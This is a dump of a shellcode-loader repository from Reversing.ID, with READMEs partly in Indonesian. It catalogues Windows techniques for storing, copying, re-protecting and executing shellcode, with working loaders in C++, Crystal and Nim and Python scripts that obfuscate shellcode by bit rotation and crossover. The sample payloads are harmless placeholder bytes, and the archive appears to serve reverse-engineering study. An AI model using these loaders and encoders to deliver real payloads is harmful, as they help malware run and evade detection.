4 | 5 | ### Overview 6 | 7 | Thread Local Storage (TLS) callback dipanggil sebelum eksekusi entrypoint terjadi. Beberapa trik anti-debug dan anti-vm umum dilakukan sebagai TLS callback karena berada pada flow yang berbeda dengan entrypoint. 8 | 9 | Jumlah TLS callback dapat lebih dari satu dan terkadang di dalam satu callback dapat dibuat callback lain saat runtime. -------------------------------------------------------------------------------- /windows/permission/NtProtectVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `NtProtectVirtualMemory`. 8 | 9 | ```c++ 10 | NTSTATUS NtProtectVirtualMemory (HANDLE ProcessHandle, PVOID * BaseAddress, PULONG NumberOfBytesToProtect, ULONG NewAccessProtection, PULONG OldAccessProtection); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [NTInternals NtProtectVirtualMemory](http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/Memory%20Management/Virtual%20Memory/NtProtectVirtualMemory.html) 16 | -------------------------------------------------------------------------------- /windows/permission/VirtualProtect/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `VirtualProtect`. 
8 | 9 | ```c++ 10 | BOOL VirtualProtect (LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN VirtualProtect](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect) 16 | -------------------------------------------------------------------------------- /windows/permission/VirtualProtectEx/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Change the memory protection of virtual address space. 4 | 5 | ### Overview 6 | 7 | Ubah permission dengan `VirtualProtectEx`. 8 | 9 | ```c++ 10 | BOOL VirtualProtectEx(HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN VirtualProtectEx](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotectex) 16 | -------------------------------------------------------------------------------- /windows/storage/global/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as global data (array). 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada segment global dan dapat diakses melalui suatu alamat memory yang konstan. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/resource/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as embedded resource in executable. 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte dan disematkan sebagai resource. Akses shellcode dilakukan dengan serangkaian operasi pembacaan resource. 
8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.h: -------------------------------------------------------------------------------- 1 | #define SHELLCODE 100 2 | -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.rc: -------------------------------------------------------------------------------- 1 | #include "resources.h" 2 | 3 | SHELLCODE RCDATA shellcode.bin -------------------------------------------------------------------------------- /windows/storage/resource/c++/resources.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/storage/resource/c++/resources.res -------------------------------------------------------------------------------- /windows/storage/resource/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/storage/resource/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/storage/section/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as separate section in executable. 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada section khusus dengan permission tertentu. Eksekusi shellcode dapat dilakukan secara langsung tanpa melakukan alokasi terpisah. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. 
-------------------------------------------------------------------------------- /windows/storage/section/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | storing payload as separate section 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: n/a 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | // create new executable section 22 | #pragma section(".code",execute,read) 23 | _declspec(allocate(".code")) 24 | uint8_t payload[] = { 0x90, 0x90, 0xCC, 0xC3 }; 25 | 26 | 27 | int main () 28 | { 29 | HANDLE th_shellcode; 30 | void * runtime = payload; 31 | 32 | // execute shellcode directly from section 33 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 34 | WaitForSingleObject (th_shellcode, -1); 35 | 36 | return 0; 37 | } -------------------------------------------------------------------------------- /windows/storage/section/rust/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/storage/stack/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Store shellcode as local data in stack (array). 4 | 5 | ### Overview 6 | 7 | Shellcode disimpan sebagai array of byte pada stack, dengan karakteristik adanya operasi push. 
Array dapat diakses melalui alamat memory relatif terhadap pointer. 8 | 9 | Catatan: eksekusi shellcode untuk sample akan menggunakan teknik menjalankan shellcode sebagai thread terpisah. -------------------------------------------------------------------------------- /windows/storage/stack/crystal/code.cr: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | # Archive of Reversing.ID 3 | # 4 | # storing payload in stack 5 | # 6 | # Run: 7 | # $ code.cr 8 | # 9 | # Technique: 10 | # - allocation: VirtualAlloc 11 | # - writing: memcpy 12 | # - permission: VirtualProtect 13 | # - execution: invoke directly 14 | 15 | # define PAGE_EXECUTE_READ because it's not defined in lib 16 | PAGE_EXECUTE_READ = 0x20 17 | 18 | # shellcode storage in stack 19 | payload = IO::Memory.new Bytes[ 0x90, 0x90, 0xCC, 0xC3 ] 20 | 21 | # allocate memory buffer for payload as READ-WRITE (no executable) 22 | runtime = LibC.VirtualAlloc(nil, payload.size, LibC::MEM_COMMIT | LibC::MEM_RESERVE, LibC::PAGE_READWRITE) 23 | 24 | # copy payload to the buffer 25 | Intrinsics.memcpy(runtime, payload.buffer, payload.size, false) 26 | 27 | # make buffer executable (R-X) 28 | LibC.VirtualProtect(runtime, payload.size, PAGE_EXECUTE_READ, out _) 29 | 30 | # execute the payload 31 | t = Proc(Int32).new(runtime, runtime) 32 | t.call -------------------------------------------------------------------------------- /windows/storage/stack/dart/pubspec.yaml: -------------------------------------------------------------------------------- 1 | name: shellcode_loader 2 | description: 3 | simple dart code to load shellcode at runtime 4 | version: 1.0.0 5 | 6 | environment: 7 | sdk: '>=2.10.0 <3.0.0' 8 | 9 | dependencies: 10 | ffi: ^1.0.0 -------------------------------------------------------------------------------- /windows/storage/stack/nim/code.nim: -------------------------------------------------------------------------------- 1 | #[ 2 | Shellcode Loader 3 
| Archive of Reversing.ID 4 | 5 | storing payload in stack 6 | 7 | Compile: 8 | $ nim c code.nim 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - permission: VirtualProtect 13 | - execution: CreateThread 14 | ]# 15 | import winim 16 | 17 | when isMainModule: 18 | var old_protect: DWORD = 0 19 | 20 | # shellcode storage in stack 21 | var payload: array[4, byte] = [byte 0x90, 0x90, 0xCC, 0xC3 ] 22 | 23 | # allocate memory buffer for payload as READ-WRITE (no executable) 24 | var runtime = VirtualAlloc(nil, payload.len, MEM_COMMIT, PAGE_READWRITE) 25 | 26 | # copy payload to the buffer 27 | copyMem(runtime, unsafeAddr payload, payload.len) 28 | 29 | # make buffer executable (R-X) 30 | var retval = VirtualProtect(runtime, payload.len, PAGE_EXECUTE_READ, addr old_protect) 31 | if retval != 0: 32 | var thread = CreateThread(nil, 0, cast[LPTHREAD_START_ROUTINE](runtime), nil, 0, nil) 33 | WaitForSingleObject(thread, -1) 34 | 35 | VirtualFree(runtime, payload.len, MEM_RELEASE) 36 | -------------------------------------------------------------------------------- /windows/storage/stack/rust/plain-winapi/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies.winapi] 8 | version = "0.3.9" 9 | features = [ 10 | "errhandlingapi", 11 | "memoryapi", 12 | "processthreadsapi", 13 | "synchapi", 14 | "winbase", 15 | "winnt", 16 | ] -------------------------------------------------------------------------------- /windows/storage/stack/rust/with-wrapper/Cargo.toml: -------------------------------------------------------------------------------- 1 | [package] 2 | name = "shellcode-loader" 3 | version = "0.1.0" 4 | edition = "2021" 5 | authors = ["Satria Ady Pradana "] 6 | 7 | [dependencies] 8 | windows = { version = "0.35.0", features = [ 9 | "Win32_Foundation", 10 | "Win32_Security", 11 | 
"Win32_System_Memory" , 12 | "Win32_System_Threading", 13 | "Win32_System_WindowsProgramming" 14 | ]} -------------------------------------------------------------------------------- /windows/storage/stack/zig/build.zig: -------------------------------------------------------------------------------- 1 | const std = @import("std"); 2 | 3 | pub fn build(b: *std.build.Builder) void { 4 | // Standard target options allows the person running `zig build` to choose 5 | // what target to build for. Here we do not override the defaults, which 6 | // means any target is allowed, and the default is native. Other options 7 | // for restricting supported target set are available. 8 | const target = b.standardTargetOptions(.{}); 9 | 10 | // Standard release options allow the person running `zig build` to select 11 | // between Debug, ReleaseSafe, ReleaseFast, and ReleaseSmall. 12 | const mode = b.standardReleaseOptions(); 13 | 14 | const exe = b.addExecutable("zig", "src/main.zig"); 15 | exe.setTarget(target); 16 | exe.setBuildMode(mode); 17 | exe.install(); 18 | 19 | const run_cmd = exe.run(); 20 | run_cmd.step.dependOn(b.getInstallStep()); 21 | if (b.args) |args| { 22 | run_cmd.addArgs(args); 23 | } 24 | 25 | const run_step = b.step("run", "Run the app"); 26 | run_step.dependOn(&run_cmd.step); 27 | 28 | const exe_tests = b.addTest("src/main.zig"); 29 | exe_tests.setTarget(target); 30 | exe_tests.setBuildMode(mode); 31 | 32 | const test_step = b.step("test", "Run unit tests"); 33 | test_step.dependOn(&exe_tests.step); 34 | } 35 | -------------------------------------------------------------------------------- /windows/writing/compression/Decompress/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `Decompress`. 
8 | 9 | ```c++ 10 | BOOL Decompress (DECOMPRESSOR_HANDLE DecompressorHandle, LPCVOID CompressedData, SIZE_T CompressedDataSize, PVOID UncompressedBuffer, SIZE_T UncompressedBufferSize, PSIZE_T UncompressedDataSize); 11 | 12 | BOOL CreateDecompressor (DWORD Algorithm, PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines, PDECOMPRESSOR_HANDLE DecompressorHandle); 13 | 14 | BOOL Compress (COMPRESSOR_HANDLE CompressorHandle, LPCVOID UncompressedData, SIZE_T UncompressedDataSize, PVOID CompressedBuffer, SIZE_T CompressedBufferSize, PSIZE_T CompressedDataSize); 15 | 16 | BOOL CreateCompressor (DWORD Algorithm, PCOMPRESS_ALLOCATION_ROUTINES AllocationRoutines, PCOMPRESSOR_HANDLE CompressorHandle); 17 | ``` 18 | 19 | ### Reference 20 | 21 | - [MSDN Decompress](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-decompress) 22 | - [MSDN Compress](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-compress) 23 | - [MSDN CreateDecompressor](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createdecompressor) 24 | - [MSDN CreateCompressor](https://docs.microsoft.com/en-us/windows/win32/api/compressapi/nf-compressapi-createcompressor) -------------------------------------------------------------------------------- /windows/writing/compression/Decompress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/compression/Decompress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | ### Overview 4 | 5 | Melakukan penyalahgunaan windows API untuk menyalin shellcode. 
6 | 7 | Fungsi yang termasuk ke dalam kategori ini adalah fungsi yang melakukan konversi dari satu format ke format lain (misal, UTF-8 ke UNICODE). Umumnya fungsi memiliki argumen berupa input dan output buffer. 8 | 9 | Shellcode yang akan diproses oleh fungsi-fungsi ini haruslah disimpan dalam format yang telah ditentukan. Dengan demikian, setiap fungsi mungkin memerlukan generator untuk mengubah (konversi) shellcode menjadi bentuk yang dapat diterima sebagai input fungsi. -------------------------------------------------------------------------------- /windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlEthernetStringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlIpv4StringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlIpv4StringToAddressEx/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/RtlIpv6StringToAddress/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/UuidFromString/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/UuidFromString/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/conversion/endianness/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan konversi endianness (little-endian dan big-endian byte order). 8 | 9 | Endian adalah urutan byte dari sebuah bilangan jika direpresentasikan di memory. Dalam representasi big-endian, penulisan byte diawali dari most-significant byte. Sementara little-endian diawali dari least-significant byte. 10 | 11 | Konversi antara little-endian dan big-endian dapat dilakukan melalui fungsi `ntoh` dan `hton`, dimana fungsi ntoh (network to host) mengasumsikan bilangan dalam big-endian dan akan dikonversi menjadi little endian. Sementara hton sebaliknya. 
12 | 13 | 14 | ```c++ 15 | uint32_t htonl (uint32_t hostlong); 16 | uint64_t htonll (uint64_t hostlong); 17 | 18 | uint32_t ntohl (uint32_t netlong); 19 | uint64_t ntohll (uint64_t netlong); 20 | ``` 21 | 22 | ### Reference 23 | 24 | - [MSDN htonl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonl) 25 | - [MSDN htonll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-htonll) 26 | - [MSDN ntohl](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohl) 27 | - [MSDN ntohll](https://docs.microsoft.com/en-us/windows/win32/api/winsock2/nf-winsock2-ntohll) 28 | -------------------------------------------------------------------------------- /windows/writing/conversion/endianness/c++/shellcode.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/conversion/endianness/c++/shellcode.bin -------------------------------------------------------------------------------- /windows/writing/copy/CopyMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `CopyMemory`. 
8 | 9 | ```c++ 10 | void CopyMemory (PVOID Destination, const VOID *Source, SIZE_T Length); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN CopyMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366535(v=vs.85)) -------------------------------------------------------------------------------- /windows/writing/copy/CopyMemory/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | writing shellcode to allocated memory 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: CopyMemory 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | int main () 22 | { 23 | void * runtime; 24 | BOOL retval; 25 | HANDLE th_shellcode; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | CopyMemory (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | 41 | if (retval != 0) 42 | { 43 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 44 | WaitForSingleObject (th_shellcode, -1); 45 | } 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /windows/writing/copy/CreatePipe/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 
4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan mekanisme pipe (`CreatePipe`, `WriteFile`, dan `ReadFile`). 8 | 9 | ```c++ 10 | BOOL CreatePipe (PHANDLE hReadPipe, PHANDLE hWritePipe, LPSECURITY_ATTRIBUTES lpPipeAttributes, DWORD nSize); 11 | 12 | BOOL WriteFile (HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); 13 | 14 | BOOL ReadFile (HANDLE hFile, LPVOID lpBuffer, DWORD nNumberOfBytesToRead, LPDWORD lpNumberOfBytesRead, LPOVERLAPPED lpOverlapped); 15 | ``` 16 | 17 | ### Reference 18 | 19 | - [MSDN CreatePipe](https://docs.microsoft.com/en-us/windows/win32/api/namedpipeapi/nf-namedpipeapi-createpipe) 20 | - [MSDN WriteFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-writefile) 21 | - [MSDN ReadFile](https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-readfile) -------------------------------------------------------------------------------- /windows/writing/copy/MoveMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 4 | 5 | ### Overview 6 | 7 | Penyalinan shellcode menggunakan `MoveMemory`. 
8 | 9 | ```c++ 10 | void MoveMemory (PVOID Destination, const VOID *Source, SIZE_T Length); 11 | ``` 12 | 13 | ### Reference 14 | 15 | - [MSDN MoveMemory](https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa366788(v=vs.85)) -------------------------------------------------------------------------------- /windows/writing/copy/MoveMemory/c++/code.cpp: -------------------------------------------------------------------------------- 1 | /* 2 | Shellcode Loader 3 | Archive of Reversing.ID 4 | 5 | writing shellcode to allocated memory 6 | 7 | Compile: 8 | $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp 9 | 10 | Technique: 11 | - allocation: VirtualAlloc 12 | - writing: MoveMemory 13 | - permission: VirtualProtect 14 | - execution: CreateThread 15 | */ 16 | 17 | #include 18 | #include 19 | #include 20 | 21 | int main () 22 | { 23 | void * runtime; 24 | BOOL retval; 25 | HANDLE th_shellcode; 26 | DWORD old_protect = 0; 27 | 28 | // shellcode storage in stack 29 | uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 }; 30 | uint32_t payload_len = 4; 31 | 32 | // allocate memory buffer for payload as READ-WRITE (no executable) 33 | runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); 34 | 35 | // copy payload to the buffer 36 | MoveMemory (runtime, payload, payload_len); 37 | 38 | // make buffer executable (R-X) 39 | retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect); 40 | 41 | if (retval != 0) 42 | { 43 | th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0); 44 | WaitForSingleObject (th_shellcode, -1); 45 | } 46 | 47 | return 0; 48 | } -------------------------------------------------------------------------------- /windows/writing/copy/NtWriteVirtualMemory/README.md: -------------------------------------------------------------------------------- 1 | # Shellcode Loader 2 | 3 | Writing shellcode to allocated memory. 
### Overview

Copying the shellcode using `NtWriteVirtualMemory`.

```c++
NTSTATUS NtWriteVirtualMemory (HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);
```

### Reference

- [NTInternals NtWriteVirtualMemory](http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtWriteVirtualMemory.html)
--------------------------------------------------------------------------------
/windows/writing/copy/RtlMoveMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copying the shellcode using `RtlMoveMemory`.

```c++
VOID RtlMoveMemory (VOID *Destination, const VOID *Source, SIZE_T Length);
```

### Reference

- [MSDN RtlMoveMemory](https://docs.microsoft.com/en-us/windows/win32/devnotes/rtlmovememory)
--------------------------------------------------------------------------------
/windows/writing/copy/RtlMoveMemory/c++/code.cpp:
--------------------------------------------------------------------------------
```c++
/*
    Shellcode Loader
    Archive of Reversing.ID

    writing shellcode to allocated memory

Compile:
    $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

Technique:
    - allocation: VirtualAlloc
    - writing:    RtlMoveMemory
    - permission: VirtualProtect
    - execution:  CreateThread
*/

#include <windows.h>   // VirtualAlloc, RtlMoveMemory, VirtualProtect, CreateThread
#include <stdint.h>    // uint8_t, uint32_t

int main ()
{
    void * runtime;
    BOOL retval;
    HANDLE th_shellcode;
    DWORD old_protect = 0;

    // shellcode storage in stack
    uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    RtlMoveMemory (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);

    if (retval != 0)
    {
        th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0);
        WaitForSingleObject (th_shellcode, -1);
    }

    return 0;
}
```
--------------------------------------------------------------------------------
/windows/writing/copy/WriteProcessMemory/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copying the shellcode using `WriteProcessMemory`.

```c++
BOOL WriteProcessMemory (HANDLE hProcess, LPVOID lpBaseAddress, LPCVOID lpBuffer, SIZE_T nSize, SIZE_T * lpNumberOfBytesWritten);
```

### Reference

- [MSDN WriteProcessMemory](https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-writeprocessmemory)
--------------------------------------------------------------------------------
/windows/writing/copy/memcpy/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

Writing shellcode to allocated memory.

### Overview

Copying the shellcode using `memcpy`.

```c++
void * memcpy (void * destination, const void * source, size_t num);
```

### Reference

- [C++ memcpy](https://www.cplusplus.com/reference/cstring/memcpy/)
--------------------------------------------------------------------------------
/windows/writing/copy/memcpy/c++/code.cpp:
--------------------------------------------------------------------------------
```c++
/*
    Shellcode Loader
    Archive of Reversing.ID

    writing shellcode to allocated memory

Compile:
    $ cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tccode.cpp

Technique:
    - allocation: VirtualAlloc
    - writing:    memcpy
    - permission: VirtualProtect
    - execution:  CreateThread
*/

#include <windows.h>   // VirtualAlloc, VirtualProtect, CreateThread
#include <stdint.h>    // uint8_t, uint32_t
#include <string.h>    // memcpy

int main ()
{
    void * runtime;
    BOOL retval;
    HANDLE th_shellcode;
    DWORD old_protect = 0;

    // shellcode storage in stack
    uint8_t payload [] = { 0x90, 0x90, 0xCC, 0xC3 };
    uint32_t payload_len = 4;

    // allocate memory buffer for payload as READ-WRITE (no executable)
    runtime = VirtualAlloc (0, payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    // copy payload to the buffer
    memcpy (runtime, payload, payload_len);

    // make buffer executable (R-X)
    retval = VirtualProtect (runtime, payload_len, PAGE_EXECUTE_READ, &old_protect);

    if (retval != 0)
    {
        th_shellcode = CreateThread (0, 0, (LPTHREAD_START_ROUTINE) runtime, 0, 0, 0);
        WaitForSingleObject (th_shellcode, -1);
    }

    return 0;
}
```
--------------------------------------------------------------------------------
/windows/writing/custom/bit-crossover/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

import random

# make sure n is 0 < n < 8
rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)

high = lambda x: x & 0xF0
low  = lambda x: x & 0x0F

# swap the low nibbles of the two bytes
cross = lambda L,R: (high(L) | low(R), high(R) | low(L))


with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# generate single byte key
key = random.randrange(1,255)

# make sure shellcode is even-length
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen  += 1

# encode shellcode
enc_shcode = [key]
idx = 0
while idx < shlen:
    L = shcode[idx    ]   # LEFT
    R = shcode[idx + 1]   # RIGHT

    # get half of each byte and cross
    L, R = cross(L, R)

    # rotate then XOR
    enc_shcode.append(rotl8(L, 3) ^ key)
    enc_shcode.append(rotr8(R, 3) ^ key)

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/bit-crossover/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/bit-crossover/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/bit-rotation/c++/generate.py:
--------------------------------------------------------------------------------
```python
# read shellcode from `shellcode.bin` and
# generate the encoded shellcode

# make sure n is 0 < n < 8 for the 8-bit and 0 < n < 16 for the 16-bit rotations
rotl8 = lambda x,n: ((x << n) & 0xFF) | (x >> (8 - n))
rotr8 = lambda x,n: (x >> n) | ((x << (8 - n)) & 0xFF)

rotl16 = lambda x,n: ((x << n) & 0xFFFF) | (x >> (16 - n))
rotr16 = lambda x,n: (x >> n) | ((x << (16 - n)) & 0xFFFF)

make_word = lambda L,R: (L << 8) | R


with open("shellcode.bin", "rb") as f:
    shcode = f.read()
    shlen  = len(shcode)

# make sure shellcode is even-length
if shlen % 2 == 1:
    shcode += b"\x90"
    shlen  += 1

# encode shellcode
enc_shcode = []
idx = 0
while idx < shlen:
    L = shcode[idx]
    R = shcode[idx + 1]

    # byte-level rotation
    L = rotl8(L, 3)
    R = rotr8(R, 7)

    # word-level rotation
    W = make_word(L, R)
    W = rotr16(W, 5)

    # split word into bytes
    enc_shcode.append((W >> 8) & 0xFF)
    enc_shcode.append(W & 0xFF)

    idx += 2

# print as C-array
print("{ ", end='')
print(",".join("0x{:02x}".format(c) for c in enc_shcode), end='')
print(" }")
```
--------------------------------------------------------------------------------
/windows/writing/custom/bit-rotation/c++/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ReversingID/Shellcode-Loader/212d430c7fbb3e9c720d061add121a2d15f7cf47/windows/writing/custom/bit-rotation/c++/shellcode.bin
--------------------------------------------------------------------------------
/windows/writing/custom/bit-swap/README.md:
--------------------------------------------------------------------------------
# Shellcode Loader

